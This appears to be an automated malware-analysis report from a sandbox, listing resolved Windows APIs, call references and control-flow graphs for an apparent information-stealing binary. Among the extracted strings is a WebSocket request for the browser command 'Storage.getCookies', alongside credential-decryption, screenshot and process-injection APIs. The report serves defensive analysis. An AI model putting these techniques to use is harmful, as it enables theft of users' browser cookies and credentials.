                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                                Function 004054A0 Relevance: 120.4, APIs: 62, Strings: 6, Instructions: 1411networkCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                  • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                                • API String ID: 2888708447-1943833848
                                                                                                                                                                                                                                                                                • Opcode ID: 32d35d3c3b93b1f3239c85e580d068b8d1f54f7d7030b5911126dd3e0ce0314f
                                                                                                                                                                                                                                                                                • Instruction ID: e4f2ee01d7335c5added529db0d38c8452bd00aeee575b7ecc144f5d552c7b4a
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32d35d3c3b93b1f3239c85e580d068b8d1f54f7d7030b5911126dd3e0ce0314f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3C2D3706087808BD734DB28C894BAFB7E1AF85318F14093EF596AB3C1D7799844CB5A
                                                                                                                                                                                                                                                                                Function 004081B0 Relevance: 109.8, APIs: 34, Strings: 28, Instructions: 1338stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 827 4081b0-408273 call 410530 ExpandEnvironmentStringsA call 410240 call 4101c0 call 4102e0 call 410340 call 410290 call 410230 * 2 call 4101c0 * 2 call 410530 FindFirstFileA 850 408279-408298 827->850 851 4093da-40944f call 410230 * 12 827->851 853 4082cd-408308 call 402400 850->853 886 409452-409457 _invalid_parameter_noinfo_noreturn 851->886 859 40830a-408319 strlen 853->859 860 40831b-40832a 853->860 859->860 861 408360-408364 860->861 862 40832c-408333 860->862 866 408437-408449 861->866 867 40836a-408392 call 402400 861->867 864 408335 862->864 865 40833b-40834e memcmp 862->865 864->865 865->867 869 408350-408352 865->869 871 408491-408493 866->871 872 40844b-40845d 866->872 883 408394-4083a5 strlen 867->883 884 4083a7-4083a9 867->884 869->867 876 408354-408356 869->876 874 4082b2-4082c7 FindNextFileA 871->874 875 408499-408502 call 410240 call 4102e0 call 410340 * 2 call 410290 call 410230 * 3 871->875 878 408488-40848e ??3@YAXPAX@Z 872->878 879 40845f-408461 872->879 874->853 885 4093cb-4093d7 FindClose 874->885 936 408504-40851d call 410530 StrCmpCA 875->936 937 408527-40855f call 410340 * 3 875->937 876->866 882 40835c 876->882 878->871 879->886 887 408467-40846c 879->887 882->867 890 4083af-4083bb 883->890 884->890 885->851 887->886 891 408472-408477 887->891 896 4083d8-4083df 890->896 897 4083bd-4083c4 890->897 891->886 893 40847d-408480 891->893 893->886 898 408486 893->898 900 4083e1-4083e4 896->900 901 4083e7-4083f2 896->901 903 4083c6 897->903 904 4083c9-4083d6 memcmp 897->904 898->878 900->901 901->866 906 4083f4-408403 901->906 903->904 904->896 904->901 909 408405-408407 906->909 910 40842e-408434 ??3@YAXPAX@Z 906->910 909->886 913 40840d-408412 909->913 910->866 913->886 916 408418-40841d 913->916 916->886 919 408423-408426 916->919 919->886 922 40842c 919->922 922->910 942 408561 936->942 943 40851f-408525 936->943 951 40859c-4085e3 call 410340 call 410290 call 410230 * 4 call 410530 StrCmpCA 937->951 945 408564-408596 call 410340 * 3 942->945 943->945 945->951 970 4087f0-408804 StrCmpCA 951->970 971 4085e9-4085fd StrCmpCA 951->971 972 40880a-408818 StrCmpCA 970->972 973 40894f-4089f6 call 410200 * 7 call 407dd0 970->973 971->970 974 408603-40871a call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 call 4101c0 call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 4076b0 971->974 976 408b08-408b23 call 410530 StrCmpCA 972->976 977 40881e-408838 call 410200 call 411520 972->977 1096 4089fb 973->1096 1306 408720-4087b3 call 410200 * 5 call 413e50 call 410230 974->1306 1307 4087b8-4087ed call 410530 DeleteFileA call 4104e0 call 410530 call 410230 * 2 974->1307 989 408a00-408a07 976->989 990 408b29-408b2f 976->990 1000 408d30-408d44 StrCmpCA 977->1000 1001 40883e-408844 977->1001 992 4082a0-4082ad call 4104e0 * 2 989->992 993 408a0d-408afb call 410200 * 4 call 4101c0 call 410200 * 4 call 4081b0 989->993 990->989 996 408b35-408b42 990->996 992->874 1165 408b00-408b03 993->1165 1003 408b48-408b56 996->1003 1004 4092ad-40937f memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 3 call 410200 * 4 996->1004 1008 408ff3-4090c0 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 1000->1008 1009 408d4a-408d58 StrCmpCA 1000->1009 1001->989 1011 40884a-408857 1001->1011 1003->874 1013 408b5c-408be7 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 1003->1013 1163 409385-409397 call 407110 1004->1163 1239 4090c5-4090c9 1008->1239 1009->989 1019 408d5e-408e10 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA 1009->1019 1021 408f24-408fee memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 2 call 410200 * 4 1011->1021 1022 40885d-40886b 1011->1022 1202 408bf0-408c13 call 410530 * 2 CopyFileA 1013->1202 1226 408e16-408e32 call 410200 call 4076b0 1019->1226 1227 408f19-408f1f 1019->1227 1021->1163 1022->874 1032 408871-40890d call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 1022->1032 1222 408910-40891f call 410530 CopyFileA 1032->1222 1097 4089fd 1096->1097 1097->989 1178 40939c-40939e 1163->1178 1165->992 1178->1097 1229 408c15-408c39 call 410200 call 411d20 Sleep 1202->1229 1230 408c4a-408c75 call 410200 call 4076b0 1202->1230 1242 408925-40894d call 410200 call 411d20 call 410530 1222->1242 1243 4091cd-4091f8 call 410200 call 4076b0 1222->1243 1260 408e37-408e3b 1226->1260 1233 4091b0-4091bc call 410530 DeleteFileA call 4104e0 1227->1233 1229->1202 1264 408c3b-408c45 call 410290 1229->1264 1268 4093b8 1230->1268 1269 408c7b-408d2b call 410340 call 410200 * 4 call 413e50 call 410230 1230->1269 1273 4091c1-4091c8 call 410230 1233->1273 1249 4091a4-4091aa 1239->1249 1250 4090cf-40919f call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1239->1250 1242->1222 1286 4093a3-4093a5 1243->1286 1287 4091fe-4092a8 call 410340 call 410200 * 4 call 413e50 call 410230 1243->1287 1249->1233 1250->1249 1270 408e41-408f0e call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1260->1270 1271 408f13 1260->1271 1264->1230 1276 4093bf-4093c6 call 410230 1268->1276 1269->1276 1270->1271 1271->1227 1273->1097 1276->874 1297 4093ac-4093b3 call 410230 1286->1297 1287->1297 1297->874 1306->1307 1307->970
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
